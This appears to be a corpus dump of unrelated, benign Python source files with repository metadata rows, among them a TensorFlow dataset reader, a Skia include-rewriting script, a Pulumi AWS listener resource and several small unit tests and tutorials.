# https://twiki.cern.ch/twiki/bin/viewauth/CMS/PileupJSONFileforData#Pileup_JSON_Files_For_Run_II
cfg.set_aux("min_bias_xs", sn.Number(69.2, (sn.Number.REL, 0.046))) # mb
# file merging information (stage -> dataset -> files after merging)
cfg.set_aux("file_merging", {
"trees": {
"data_D_e": 2,
"data_A_mu": 2,
"data_D_mu": 3,
"tt_dl": 456,
"tt_sl": 491,
"dy_lep_LO_50ToInf": 30,
"st_s_lep": 14,
"st_t_t": 14,
"st_t_tbar": 7,
"st_tW_t": 34,
"st_tW_tbar": 31,
"WW": 3,
"WZ": 2,
"W_lep": 3
}
})
# versions
cfg.set_aux("versions", {
"WriteTrees": "prod2", # including SL events
"MergeTrees": "prod2",
"MergeMetaData": "prod2",
"WriteHistograms": "prod2",
"MergeHistograms": "prod2",
"MeasureCScaleFactors": "prod1",
"MeasureScaleFactors": "prod1",
"FitScaleFactors": "prod1",
"BundleScaleFactors": "prod1",
"GetScaleFactorWeights": "prod1",
"MergeScaleFactorWeights": "prod1",
"OptimizeBinning": "prod1",
"CreateScaleFactorResults": "prod1",
})
return cfg
| 37.331858 | 126 | 0.620244 | 1,007 | 8,437 | 4.901688 | 0.364449 | 0.015802 | 0.023096 | 0.029984 | 0.20077 | 0.20077 | 0.157415 | 0.12581 | 0.106969 | 0.106969 | 0 | 0.23629 | 0.24357 | 8,437 | 225 | 127 | 37.497778 | 0.537136 | 0.1286 | 0 | 0.19209 | 0 | 0.016949 | 0.31748 | 0.165368 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00565 | false | 0 | 0.022599 | 0 | 0.033898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6c90866da3558fa85354b9fb39f92f13564b2e73 | 469 | py | Python | src/py_call.py | Lucien-MG/htools | c7cce486a101b182b03f0ac69e168b767a5c8d16 | [
"MIT"
] | null | null | null | src/py_call.py | Lucien-MG/htools | c7cce486a101b182b03f0ac69e168b767a5c8d16 | [
"MIT"
] | null | null | null | src/py_call.py | Lucien-MG/htools | c7cce486a101b182b03f0ac69e168b767a5c8d16 | [
"MIT"
] | null | null | null | #/bin/python3
import os
import subprocess
# Const:
with open("config",'r') as conf:
VENV_A = conf.read()
PYTHON="python"
PYTHON3_VENV_A = os.path.join(VENV_A, "bin", "python3")
PIP=""
PIP_VENV_A= os.path.join(VENV_A, "bin", "pip3")
# Functions:
def python_call(argv):
subprocess.call([PYTHON, argv])
def python_vcall(argv):
subprocess.check_output([PYTHON3_VENV_A, argv])
def pip_vinstall(argv):
subprocess.check_output([PIP_VENV_A, argv])
| 17.37037 | 55 | 0.697228 | 71 | 469 | 4.380282 | 0.394366 | 0.11254 | 0.07717 | 0.07074 | 0.14791 | 0.14791 | 0.14791 | 0.14791 | 0 | 0 | 0 | 0.012469 | 0.144989 | 469 | 26 | 56 | 18.038462 | 0.763092 | 0.063966 | 0 | 0 | 0 | 0 | 0.068807 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.142857 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6c9944dc5b1ae363873ef1748ed4ad89a74178d6 | 261 | py | Python | register_classes.py | Iherrbenza/SMB100A_Python | 80af83faa306a31f323869c2d20f121bb941d85b | [
"BSD-3-Clause"
] | null | null | null | register_classes.py | Iherrbenza/SMB100A_Python | 80af83faa306a31f323869c2d20f121bb941d85b | [
"BSD-3-Clause"
] | null | null | null | register_classes.py | Iherrbenza/SMB100A_Python | 80af83faa306a31f323869c2d20f121bb941d85b | [
"BSD-3-Clause"
] | null | null | null | # @Date: 2020-04-05T14:08:33+10:00
# @Last modified time: 2020-04-08T18:40:22+10:00
from labscript_devices import register_classes
register_classes(
'SMB100A',
BLACS_tab='labscript_devices.SMB100A.blacs_tabs.SMB100ATab',
runviewer_parser=None
)
| 23.727273 | 64 | 0.754789 | 38 | 261 | 5 | 0.736842 | 0.063158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197368 | 0.126437 | 261 | 10 | 65 | 26.1 | 0.635965 | 0.310345 | 0 | 0 | 0 | 0 | 0.305085 | 0.265537 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6c9d70099a722ba2fbced930795b4aaa3c0d43d3 | 3,044 | py | Python | Super_TF/Dataset_IO/Classification/Dataset_reader_classification.py | Dhruv-Mohan/Super_TF | c693663adc59947cb7d15bd42ff260b7d3de6bdc | [
"MIT"
] | 8 | 2017-10-29T18:50:49.000Z | 2020-09-23T10:55:27.000Z | Super_TF/Dataset_IO/Classification/Dataset_reader_classification.py | Dhruv-Mohan/Tensorflow_Playground | c693663adc59947cb7d15bd42ff260b7d3de6bdc | [
"MIT"
] | null | null | null | Super_TF/Dataset_IO/Classification/Dataset_reader_classification.py | Dhruv-Mohan/Tensorflow_Playground | c693663adc59947cb7d15bd42ff260b7d3de6bdc | [
"MIT"
] | 1 | 2021-01-27T09:32:53.000Z | 2021-01-27T09:32:53.000Z | from utils.Dataset_reader import Dataset_reader
from Dataset_IO.Classification.Dataset_conifg_classification import Dataset_conifg_classification
import Dataset_IO.Classification.Dataset_classification_pb2 as proto
import tensorflow as tf
import os
#TODO: ADD TFRECORDS AND MEANPROTO READING CHECKS
class Dataset_reader_classification(Dataset_reader,Dataset_conifg_classification):
"""Implementation of Dataset reader for classification"""
def __init__(self, filename=None, epochs=100, num_classes=18):
super().__init__()
with tf.name_scope('Dataset_Classification_Reader') as scope:
self.batch_size = tf.placeholder(tf.int32, name='Dataset_batch_size')
self.num_classes = num_classes
self.open_dataset(filename=filename, epochs=epochs)
self.mean_header_proto = proto.Image_set()
dataset_path, dataset_name = os.path.split(filename)
common_name, _ = os.path.splitext(dataset_name)
mean_file_path = os.path.join(dataset_path,common_name +'_mean.proto')
with open(mean_file_path,"rb") as mean_header_file:
self.mean_header_proto.ParseFromString(mean_header_file.read())
self.image_shape = [self.mean_header_proto.Image_headers.image_height, self.mean_header_proto.Image_headers.image_width, self.mean_header_proto.Image_headers.image_depth]
mean_image_data = self.mean_header_proto.mean_data
self.mean_image = tf.image.convert_image_dtype(tf.image.decode_image(mean_image_data), tf.float32)
self.mean_image.set_shape(self.image_shape)
self.images , self.one_hot_labels = self.batch_inputs()
def single_read(self):
features = tf.parse_single_example(self.serialized_example, features=self._Feature_dict)
image = tf.image.decode_image(features[self._Image_handle])
image.set_shape(self.image_shape)
image = tf.image.convert_image_dtype(image, tf.float32)
image = image - self.mean_image
return image , features[self._Label_handle]
def pre_process_image(self,pre_process_op):
with tf.name_scope('Pre_Processing_op') as scope:
self.images = pre_process_op(self.images)
def batch_inputs(self):
image , label = self.single_read()
images , sparse_labels = tf.train.shuffle_batch([image , label], batch_size=self.batch_size, num_threads=8, capacity=5000+128, min_after_dequeue=5000)
one_hot_labels = tf.one_hot(sparse_labels,self.num_classes)
return images, one_hot_labels
#TODO: CONFIGURABLE PARAMS
def next_batch(self, batch_size=1, sess=None):
with tf.name_scope('Batch_getter') as scope:
if sess is None :
self.sess = tf.get_default_session()
else:
self.sess = sess
images , labels = self.sess.run([self.images , self.one_hot_labels], feed_dict={self.batch_size : batch_size})
return images , labels
| 42.873239 | 182 | 0.704993 | 401 | 3,044 | 5.012469 | 0.276808 | 0.035821 | 0.041791 | 0.056716 | 0.171642 | 0.135323 | 0.053731 | 0 | 0 | 0 | 0 | 0.010369 | 0.20795 | 3,044 | 70 | 183 | 43.485714 | 0.82331 | 0.041064 | 0 | 0 | 0 | 0 | 0.030574 | 0.009962 | 0 | 0 | 0 | 0.014286 | 0 | 1 | 0.108696 | false | 0 | 0.108696 | 0 | 0.304348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ca00e46178f8bac44744669d606c5898da9f6e3 | 2,254 | py | Python | tools/rewrite_includes.py | Shachlan/skia | 633db4db7672fd55b48ba1073256853e00f18d8c | [
"BSD-3-Clause"
] | 6 | 2018-10-20T10:53:55.000Z | 2021-12-25T07:58:57.000Z | tools/rewrite_includes.py | Shachlan/skia | 633db4db7672fd55b48ba1073256853e00f18d8c | [
"BSD-3-Clause"
] | null | null | null | tools/rewrite_includes.py | Shachlan/skia | 633db4db7672fd55b48ba1073256853e00f18d8c | [
"BSD-3-Clause"
] | 9 | 2018-10-31T03:07:11.000Z | 2021-08-06T08:53:21.000Z | #!/usr/bin/python2
#
# Copyright 2019 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
roots = [
'bench',
'dm',
'docs',
'example',
'experimental',
'fuzz',
'gm',
'include',
'modules',
'platform_tools/android/apps',
'samplecode',
'src',
'tests',
'third_party/etc1',
'third_party/gif',
'tools'
]
# Map short name -> absolute path for all Skia headers.
headers = {}
for root in roots:
for path, _, files in os.walk(root):
for file_name in files:
if file_name.endswith('.h'):
if file_name in headers:
print path, file_name, headers[file_name]
assert file_name not in headers
headers[file_name] = os.path.abspath(os.path.join(path, file_name))
# Rewrite any #includes relative to Skia's top-level directory.
for root in roots:
for path, _, files in os.walk(root):
if 'generated' in path:
continue
for file_name in files:
if (file_name.endswith('.h') or
file_name.endswith('.c') or
file_name.endswith('.m') or
file_name.endswith('.mm') or
file_name.endswith('.inc') or
file_name.endswith('.fp') or
file_name.endswith('.cc') or
file_name.endswith('.cpp')):
# Read the whole file into memory.
file_path = os.path.join(path, file_name)
lines = open(file_path).readlines()
# Write it back out again line by line with substitutions for #includes.
with open(file_path, 'w') as output:
includes = []
for line in lines:
parts = line.split('"')
if (len(parts) == 3
and '#' in parts[0]
and 'include' in parts[0]
and os.path.basename(parts[1]) in headers):
header = headers[os.path.basename(parts[1])]
includes.append(parts[0] +
'"%s"' % os.path.relpath(header, '.') +
parts[2])
else:
for inc in sorted(includes):
print >>output, inc.strip('\n')
includes = []
print >>output, line.strip('\n')
| 28.531646 | 80 | 0.550577 | 287 | 2,254 | 4.233449 | 0.421603 | 0.118519 | 0.118519 | 0.103704 | 0.192593 | 0.159671 | 0.123457 | 0.123457 | 0.123457 | 0.123457 | 0 | 0.008513 | 0.322538 | 2,254 | 78 | 81 | 28.897436 | 0.787164 | 0.159716 | 0 | 0.133333 | 0 | 0 | 0.09782 | 0.014354 | 0 | 0 | 0 | 0 | 0.016667 | 0 | null | null | 0 | 0.016667 | null | null | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ca2384cbcb96f1ed16b80307991583b5132ac71 | 598 | py | Python | unit_tests/test_class_query.py | usc-isi-i2/gaia-question-sparql | fb40ea6259686997ad9d805729fcca80516ddf92 | [
"MIT"
] | null | null | null | unit_tests/test_class_query.py | usc-isi-i2/gaia-question-sparql | fb40ea6259686997ad9d805729fcca80516ddf92 | [
"MIT"
] | null | null | null | unit_tests/test_class_query.py | usc-isi-i2/gaia-question-sparql | fb40ea6259686997ad9d805729fcca80516ddf92 | [
"MIT"
] | null | null | null | import unittest
import sys
import os
sys.path.append('../')
from src.class_query import ClassQuery
from src.query_tool import QueryTool, Mode
base_path = os.path.dirname(__file__)
cq = ClassQuery(base_path + '/sample_queries/class_queries.xml')
class TestClassQuery(unittest.TestCase):
def test_class_cluster(self):
qt = QueryTool(base_path + '/sample_ttls/doc1.ttl', Mode.CLUSTER)
responses, stat, errors = cq.ask_all(qt)
res = [len(x.find('justifications')) for x in responses.getchildren()]
self.assertFalse(errors)
self.assertEqual(res, [2, 1])
| 28.47619 | 78 | 0.712375 | 81 | 598 | 5.074074 | 0.592593 | 0.058394 | 0.068127 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006012 | 0.165552 | 598 | 20 | 79 | 29.9 | 0.817635 | 0 | 0 | 0 | 0 | 0 | 0.119128 | 0.090604 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.066667 | false | 0 | 0.333333 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
6ca7fb675928141bb07d0f78ee1eb39e58fe4eda | 296 | py | Python | NetCatKS/DProtocol/api/interfaces/storage/__init__.py | dimddev/NetCatKS-CP | 2d9e72b2422e344569fd4eb154866b98e9707561 | [
"BSD-2-Clause"
] | null | null | null | NetCatKS/DProtocol/api/interfaces/storage/__init__.py | dimddev/NetCatKS-CP | 2d9e72b2422e344569fd4eb154866b98e9707561 | [
"BSD-2-Clause"
] | null | null | null | NetCatKS/DProtocol/api/interfaces/storage/__init__.py | dimddev/NetCatKS-CP | 2d9e72b2422e344569fd4eb154866b98e9707561 | [
"BSD-2-Clause"
] | null | null | null | __author__ = 'dimd'
from zope.interface import Interface, Attribute
class IProtocolStogareInterface(Interface):
"""
This interface define our session storage
Every custom storage have to implement this Interface
"""
session = Attribute(""" Container for our session """) | 21.142857 | 58 | 0.722973 | 31 | 296 | 6.774194 | 0.677419 | 0.12381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.199324 | 296 | 14 | 58 | 21.142857 | 0.886076 | 0.320946 | 0 | 0 | 0 | 0 | 0.17033 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6caacd92f800cd39592b48cdfb06a9aeead365f0 | 10,543 | py | Python | sdk/python/pulumi_aws_native/elasticloadbalancingv2/listener.py | AaronFriel/pulumi-aws-native | 5621690373ac44accdbd20b11bae3be1baf022d1 | [
"Apache-2.0"
] | 29 | 2021-09-30T19:32:07.000Z | 2022-03-22T21:06:08.000Z | sdk/python/pulumi_aws_native/elasticloadbalancingv2/listener.py | AaronFriel/pulumi-aws-native | 5621690373ac44accdbd20b11bae3be1baf022d1 | [
"Apache-2.0"
] | 232 | 2021-09-30T19:26:26.000Z | 2022-03-31T23:22:06.000Z | sdk/python/pulumi_aws_native/elasticloadbalancingv2/listener.py | AaronFriel/pulumi-aws-native | 5621690373ac44accdbd20b11bae3be1baf022d1 | [
"Apache-2.0"
] | 4 | 2021-11-10T19:42:01.000Z | 2022-02-05T10:15:49.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ListenerArgs', 'Listener']
@pulumi.input_type
class ListenerArgs:
def __init__(__self__, *,
default_actions: pulumi.Input[Sequence[pulumi.Input['ListenerActionArgs']]],
load_balancer_arn: pulumi.Input[str],
alpn_policy: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input['ListenerCertificateArgs']]]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
ssl_policy: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Listener resource.
"""
pulumi.set(__self__, "default_actions", default_actions)
pulumi.set(__self__, "load_balancer_arn", load_balancer_arn)
if alpn_policy is not None:
pulumi.set(__self__, "alpn_policy", alpn_policy)
if certificates is not None:
pulumi.set(__self__, "certificates", certificates)
if port is not None:
pulumi.set(__self__, "port", port)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if ssl_policy is not None:
pulumi.set(__self__, "ssl_policy", ssl_policy)
@property
@pulumi.getter(name="defaultActions")
def default_actions(self) -> pulumi.Input[Sequence[pulumi.Input['ListenerActionArgs']]]:
return pulumi.get(self, "default_actions")
@default_actions.setter
def default_actions(self, value: pulumi.Input[Sequence[pulumi.Input['ListenerActionArgs']]]):
pulumi.set(self, "default_actions", value)
@property
@pulumi.getter(name="loadBalancerArn")
def load_balancer_arn(self) -> pulumi.Input[str]:
return pulumi.get(self, "load_balancer_arn")
@load_balancer_arn.setter
def load_balancer_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "load_balancer_arn", value)
@property
@pulumi.getter(name="alpnPolicy")
def alpn_policy(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "alpn_policy")
@alpn_policy.setter
def alpn_policy(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "alpn_policy", value)
@property
@pulumi.getter
def certificates(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ListenerCertificateArgs']]]]:
return pulumi.get(self, "certificates")
@certificates.setter
def certificates(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ListenerCertificateArgs']]]]):
pulumi.set(self, "certificates", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="sslPolicy")
def ssl_policy(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "ssl_policy")
@ssl_policy.setter
def ssl_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_policy", value)
class Listener(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alpn_policy: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]]] = None,
default_actions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerActionArgs']]]]] = None,
load_balancer_arn: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
ssl_policy: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Resource Type definition for AWS::ElasticLoadBalancingV2::Listener
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ListenerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Resource Type definition for AWS::ElasticLoadBalancingV2::Listener
:param str resource_name: The name of the resource.
:param ListenerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ListenerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alpn_policy: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]]] = None,
default_actions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerActionArgs']]]]] = None,
load_balancer_arn: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
ssl_policy: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ListenerArgs.__new__(ListenerArgs)
__props__.__dict__["alpn_policy"] = alpn_policy
__props__.__dict__["certificates"] = certificates
if default_actions is None and not opts.urn:
raise TypeError("Missing required property 'default_actions'")
__props__.__dict__["default_actions"] = default_actions
if load_balancer_arn is None and not opts.urn:
raise TypeError("Missing required property 'load_balancer_arn'")
__props__.__dict__["load_balancer_arn"] = load_balancer_arn
__props__.__dict__["port"] = port
__props__.__dict__["protocol"] = protocol
__props__.__dict__["ssl_policy"] = ssl_policy
__props__.__dict__["listener_arn"] = None
super(Listener, __self__).__init__(
'aws-native:elasticloadbalancingv2:Listener',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Listener':
"""
Get an existing Listener resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ListenerArgs.__new__(ListenerArgs)
__props__.__dict__["alpn_policy"] = None
__props__.__dict__["certificates"] = None
__props__.__dict__["default_actions"] = None
__props__.__dict__["listener_arn"] = None
__props__.__dict__["load_balancer_arn"] = None
__props__.__dict__["port"] = None
__props__.__dict__["protocol"] = None
__props__.__dict__["ssl_policy"] = None
return Listener(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="alpnPolicy")
def alpn_policy(self) -> pulumi.Output[Optional[Sequence[str]]]:
return pulumi.get(self, "alpn_policy")
@property
@pulumi.getter
def certificates(self) -> pulumi.Output[Optional[Sequence['outputs.ListenerCertificate']]]:
return pulumi.get(self, "certificates")
@property
@pulumi.getter(name="defaultActions")
def default_actions(self) -> pulumi.Output[Sequence['outputs.ListenerAction']]:
return pulumi.get(self, "default_actions")
@property
@pulumi.getter(name="listenerArn")
def listener_arn(self) -> pulumi.Output[str]:
return pulumi.get(self, "listener_arn")
@property
@pulumi.getter(name="loadBalancerArn")
def load_balancer_arn(self) -> pulumi.Output[str]:
return pulumi.get(self, "load_balancer_arn")
@property
@pulumi.getter
def port(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "port")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="sslPolicy")
def ssl_policy(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "ssl_policy")
| 42.003984 | 134 | 0.650858 | 1,154 | 10,543 | 5.619584 | 0.123917 | 0.0899 | 0.084965 | 0.057826 | 0.661372 | 0.573015 | 0.467849 | 0.402621 | 0.341557 | 0.259676 | 0 | 0.000497 | 0.236271 | 10,543 | 250 | 135 | 42.172 | 0.804893 | 0.095608 | 0 | 0.405263 | 1 | 0 | 0.125334 | 0.021992 | 0 | 0 | 0 | 0 | 0 | 1 | 0.147368 | false | 0.005263 | 0.036842 | 0.078947 | 0.278947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6cad74d49e4e9a08a93a53a5673e980c74cb3858 | 3,074 | py | Python | tests/test_individual.py | viswanathareddya/Geektrust_in_family | 197d4d0eadf191e1ef9d7d21d6d81d62645169c2 | [
"MIT"
] | null | null | null | tests/test_individual.py | viswanathareddya/Geektrust_in_family | 197d4d0eadf191e1ef9d7d21d6d81d62645169c2 | [
"MIT"
] | null | null | null | tests/test_individual.py | viswanathareddya/Geektrust_in_family | 197d4d0eadf191e1ef9d7d21d6d81d62645169c2 | [
"MIT"
] | null | null | null | import unittest
from Familytree.individual import Person
from Familytree import variables
class Testperson(unittest.TestCase):
def setUp(self):
self.person = Person(1, "Jane", "Female")
def test_initialization(self):
# check instance
self.assertEqual(isinstance(self.person, Person), True)
# check properties
self.assertEqual(self.person.id, 1)
self.assertEqual(self.person.name, "Jane")
self.assertEqual(self.person.gender, "Female")
self.assertEqual(self.person.mother, None)
self.assertEqual(self.person.father, None)
self.assertEqual(self.person.spouse, None)
self.assertEqual(self.person.children, [])
def test_assign_mother(self):
mother_error_case = "error_value"
mother_error_male_case = Person(2, "male_person", "Male")
mother_success_case = Person(3, "Mother", "Female")
# error case
self.assertRaises(ValueError, self.person.assign_mother, mother_error_case)
self.assertRaises(ValueError, self.person.assign_mother, mother_error_male_case)
# success case
self.person.assign_mother(mother_success_case)
self.assertEqual(self.person.mother.name, "Mother")
self.assertTrue(self.person.mother.gender, "Female")
def test_assign_father(self):
father_error_case = "error_value"
father_error_female_case = Person(2, "female_father", "Female")
father_success_case = Person(3, "Father", "Male")
# error cases
self.assertRaises(ValueError, self.person.assign_father, father_error_case)
self.assertRaises(ValueError, self.person.assign_father, father_error_female_case)
# success case
self.person.assign_father(father_success_case)
self.assertEqual(self.person.father.name, "Father")
self.assertTrue(self.person.father.gender, "Male")
def test_assign_spouse(self):
spouse_error_case = "error_value"
spouse_error_same_gender = Person(2, "same_gender_spouse", "Female")
spouse_success_case = Person(3, "Husband", "Male")
# error cases
self.assertRaises(ValueError, self.person.assign_spouse, spouse_error_case)
self.assertRaises(ValueError, self.person.assign_spouse, spouse_error_same_gender)
# success case
self.person.assign_spouse(spouse_success_case)
self.assertEqual(self.person.spouse.name, "Husband")
self.assertEqual(self.person.spouse.gender, "Male")
def test_add_children(self):
child_error_case = "error_Case"
child_success_case = Person(4, "Daughter", "Female")
# error case
self.assertRaises(ValueError, self.person.add_children, child_error_case)
# success case
self.person.add_children(child_success_case)
self.assertEqual(len(self.person.children), 1)
self.assertEqual(self.person.children[0].name, "Daughter")
self.assertEqual(self.person.children[0].gender, "Female")
if __name__ == '__main__':
unittest.main()
| 37.487805 | 90 | 0.691282 | 363 | 3,074 | 5.61708 | 0.14876 | 0.142227 | 0.121138 | 0.159392 | 0.50613 | 0.342325 | 0.225601 | 0.225601 | 0.193722 | 0.064247 | 0 | 0.004886 | 0.201041 | 3,074 | 81 | 91 | 37.950617 | 0.825326 | 0.041965 | 0 | 0 | 0 | 0 | 0.076005 | 0 | 0 | 0 | 0 | 0 | 0.461538 | 1 | 0.115385 | false | 0 | 0.057692 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6cae071fb0b7de70166dc34fefb63b3a8b59aa07 | 795 | py | Python | examples/first_class_functions.py | HansVdb/pythonavd-d01 | 8434a7e211709f59994280501f0361951db5a05c | [
"BSD-2-Clause"
] | null | null | null | examples/first_class_functions.py | HansVdb/pythonavd-d01 | 8434a7e211709f59994280501f0361951db5a05c | [
"BSD-2-Clause"
] | null | null | null | examples/first_class_functions.py | HansVdb/pythonavd-d01 | 8434a7e211709f59994280501f0361951db5a05c | [
"BSD-2-Clause"
] | null | null | null | def foo():
print("I'm a lovely foo()-function")
print(foo)
# <function foo at 0x7f9b75de3f28>
print(foo.__class__)
# <class 'function'>
bar = foo
bar()
# I'm a lovely foo()-function
print(bar.__name__)
# foo
def do_something(what):
"""Executes a function
:param what: name of the function to be executed
"""
what()
do_something(foo)
# I'm a lovely foo()-function
def try_me(self):
print('I am '+self.name)
print("I was created by " + self.creator)
print("This is wat I do")
self()
# a function is an object with attributed and methods
setattr(foo, 'name', 'foo')
foo.creator = "Hans"
foo.print = try_me
foo.print(foo)
"""
I am foo
I was created by Hans
This is wat I do
I'm a lovely foo()-function
"""
print(foo)
# <function foo at 0x7f9b75de3f28>
